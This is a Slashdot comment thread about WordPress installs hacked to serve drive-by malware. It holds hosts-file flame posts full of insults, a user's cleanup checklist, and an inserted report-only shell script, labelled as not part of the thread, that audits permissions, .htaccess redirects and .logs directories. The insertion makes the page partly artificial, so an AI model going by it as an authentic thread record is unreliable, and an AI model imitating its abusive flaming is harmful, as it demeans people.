Windows XP has not been sold since June 30, 2008. On October 22, 2010, you will not be able to purchase new computers that already have Windows XP installed on them.

http://www.ehow.com/facts_6876358_buy-copy-windows-xp.html [ehow.com]

It is not a current build of Windows idiot. Everyone knows that except you, but then, you DO know that too, don't you? You're just being a trolling waste of life, otherwise you wouldn't do your ac stalking posts would you. Of course not. It is fun making you look stupid though.

APK

P.S.=> I must ask - how BADLY have I 'kicked your ass' here and on what particular technical topic that you insist on attempting to stalk & harass me by your ac stalkings of myself, hmmm? LOL! Your "geek angst" is showing, and I don't think you possess the intelligence to realize 1 simple fact: You will never have the intelligence to get the better of myself, ever... apk

DOUBLE FAIL ON YOUR PART AGAIN, troll, lol! (0)

Anonymous Coward | more than 2 years ago | (#39277339)

"By the way, the hosts file won't even work to block IP addresses (on current versions of Windows at least)." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

CORRECTION troll: HOSTS NEVER COULD BLOCK IP ADDRESS BASED ATTACKS ON ANY FORM OF WINDOWS (or other OS'), you utter fool...

* It's no small wonder you post as AC trying to 'goad/harass' me, but to no avail... you're my "AC stalker troll" and you've eaten your b.s. SO MANY TIMES vs. myself? It's not even funny anymore...

APK

P.S.=> Lastly, & perhaps MOST importantly? If you're going to be stupid enough to try to "take me on" & especially on hosts files?? Realize, I practically "wrote the book" on them... I love this part best though, seeing as I can "hit you over your blunt skull with it":

"When all you have is a hammer..." - by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

Yea, lol... letting you whack yourself over the head with it TWICE here? Priceless... lol!

...apk

incorrect: hosts can't block ip address ranges (0)

Anonymous Coward | more than 2 years ago | (#39301305)

Yes, you WOULD come along and decide to use the hosts file to block entire IP ranges. Which, of course, would require hundreds or thousands of entries, rather than a single firewall rule. by Anonymous Coward on Wednesday March 07, @12:29PM (#39276505)

See subject. Can't be done\incorrect. You said it, apk didn't. Apk posted proof from long ago he knows this, despite your trolling, your own statement buries you right there.

Can a firewall do this? (0)

Anonymous Coward | more than 2 years ago | (#39301571)

hosts file can speed up access to his favorite websites by placing the ip address to domain-host name equation into them for his favorite sites avoiding possibly downed or compromised DNS servers (dns poisoning attacks and other known dns issues) as well as plusses for anonymity by the avoidance of DNS request logs or even dns block lists\dnsbls. Firewalls can't, and yet hosts can block out known bad host domains in them (which are the majority of what malware makers use versus ip addresses because domainnames are recyclable). Hosts offer that level of "defense in depth", but also speed gains (adbanner blocking most of all). I've read his posts on that here and elsewhere and apk's absolutely correct on that and has taken on naysayers here for years winning every time versus they. He illustrates both how hosts files are superior to DNS and adblock alone (both have big shortcomings, especially since adblock 'souled out' and doesn't block all ads anymore) and, how they complement them as well as overcoming their shortcomings.

Why bother with an infector? (2)

Opportunist (166417) | more than 2 years ago | (#39275557)

Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

Re:Why bother with an infector? (3, Interesting)

DigiShaman (671371) | more than 2 years ago | (#39275883)

Agreed. The best form of hacking isn't technical, it's social. This is what happens when con artists turn to technology as another venue by which to exploit people.

Managed hosting infection (-1)

Anonymous Coward | more than 2 years ago | (#39275569)

A number of web sites hosted at Verisign got hit by this and a lot of them were randomly serving up malware. It took a while to identify and remove it.

Its 2012 and yet still... (-1, Troll)

Viol8 (599362) | more than 2 years ago | (#39275901)

... the Windows OS gets infected by a drive by web injection. How many more decades will MS continue to produce OS software that's this vulnerable? Yes I know the kernel user security is fine, but that's no use if the surrounding subsystems and apps just bypass it via administrator all the time.

Re:Its 2012 and yet still... (3, Informative)

X0563511 (793323) | more than 2 years ago | (#39276213)

Are you an idiot? The article is talking about WORDPRESS - a web application! Windows isn't involved!

Re:Its 2012 and yet still... (0)

Spy Handler (822350) | more than 2 years ago | (#39276511)

he's probably just auto-posting anti-MS fud and pro-Android/Google to build karma. Watch his comment become insightful soon.

Re:Its 2012 and yet still... (1)

NotBorg (829820) | more than 2 years ago | (#39276807)

You're right no one would ever want to involve Windows with their Wordpress install. The year of Windows on the server will never come.

So where does the malware get downloaded to idiot? (1)

Viol8 (599362) | more than 2 years ago | (#39285511)

Wordpress is the vector.

Fscking moron.

Re:So where does the malware get downloaded to idi (1)

X0563511 (793323) | more than 2 years ago | (#39288179)

So? The article is talking about the vector, not the payload.

Fscking moron.

Continued Password Problem (1)

Neutral_Observer (1409941) | more than 2 years ago | (#39275933)

Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!

Re:Continued Password Problem (1)

Anonymous Coward | more than 2 years ago | (#39276037)

Hunter2
 
Now get off my lawn!

thhis FP for GNAA (-1)

Anonymous Coward | more than 2 years ago | (#39276183)

the lAs&t night of

Is there a Linux version? (0)

Anonymous Coward | more than 2 years ago | (#39276263)

If so, where can I get it?

For Newbs: Steps to Fix (5, Informative)

dgrotto (2588895) | more than 2 years ago | (#39276675)

Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

  1) Backup sites.
  2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
  3) Clean up infected PHP files with this script from php-beginners.com [php-beginners.com]. Thank you Paolo.
  4) Inspect all .htaccess configs for errant redirects and fix.
  5) Install and run the timthumb vulnerability scanner [wordpress.org]. Possible secondary vector. Thank you Peter Butler!
  6) Update your WP install to latest and greatest.
  7) Remove any unused plugins and themes.
  8) Backup sites.

I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but it still shocks me how insecure this app is.

Re:For Newbs: Steps to Fix (1)

dgrotto (2588895) | more than 2 years ago | (#39276749)

Forgot one thing:

The hack puts a list of sites to redirect to in a .logs directory. rm these.
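
A read-only audit for steps 2 and 4 of the checklist above and for the .logs directories mentioned in the follow-up, added here as an example and not part of either comment. The function names and the redirect pattern (a Redirect, RedirectMatch or RewriteRule line pointing at an absolute http/https URL) are assumptions; it only reports and changes nothing.

```shell
#!/bin/sh
# Added example: report-only audit of a WordPress tree.
# Usage: sh wp_audit.sh /path/to/wordpress   (exit 1 if anything was found)

# Checklist step 2: directories writable by "other" (mode bit 0002).
find_world_writable_dirs() {
    find "$1" -type d -perm -0002 -print
}

# Checklist step 4: .htaccess lines that send visitors to an absolute URL.
# Internal rewrites (no http:// or https:// target) are not reported.
# Assumed pattern; legitimate external redirects will show up too and
# need a human to confirm them.
find_htaccess_redirects() {
    find "$1" -type f -name .htaccess -exec \
        grep -HniE '^[[:space:]]*(Redirect|RedirectMatch|RewriteRule)[[:space:]].*https?://' {} +
}

# Follow-up comment: hidden .logs directories holding the redirect list.
find_logs_dirs() {
    find "$1" -type d -name .logs -print
}

# Run every check, print findings grouped by check name.
# Returns 0 when clean, 1 when any check reported something, 2 on bad input.
wp_audit() {
    root=$1
    [ -d "$root" ] || { echo "not a directory: $root" >&2; return 2; }
    found=0
    for check in find_world_writable_dirs find_htaccess_redirects find_logs_dirs; do
        # grep exits non-zero when nothing matches; that is not an error here.
        out=$("$check" "$root") || true
        if [ -n "$out" ]; then
            printf '== %s ==\n%s\n' "$check" "$out"
            found=1
        fi
    done
    return "$found"
}

if [ "$#" -gt 0 ]; then
    wp_audit "$1"
fi
```

Run it before the cleanup to see what needs fixing and again afterwards; a clean tree prints nothing and returns 0.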

Related drive-by malware (3, Informative)

ThatsNotPudding (1045640) | more than 2 years ago | (#39277193)

BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victim's computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...

Re:Related drive-by malware (0)

Anonymous Coward | more than 2 years ago | (#39280381)

You're absolutely right about that, and java can be just as bad with default installs of ask toolbar, carbonite backup trials, or whatever their flavor of the week is.

You're wrong however about "installing norton". That particular Norton gadget isn't going to conflict with an existing a/v scanner, it's just a checkup program.... .... which scans your computer, tells you about (somewhat legitimate) "threats" it has found, and offers to sell you Norton... ... which seems like a familiar tactic for some reason.

and I was looking for a blog site (1)

Skapare (16644) | more than 2 years ago | (#39278459)

And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

Which versions? (1)

sigaar (733777) | more than 2 years ago | (#39278461)

Any idea which versions of Wordpress are being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.

Wow, mass posting of idiotic clueless comments. (0)

Anonymous Coward | more than 2 years ago | (#39295021)

Blame this, blame that. Guess what, the problem is what you see in the mirror when you look in one. Learn your shit!
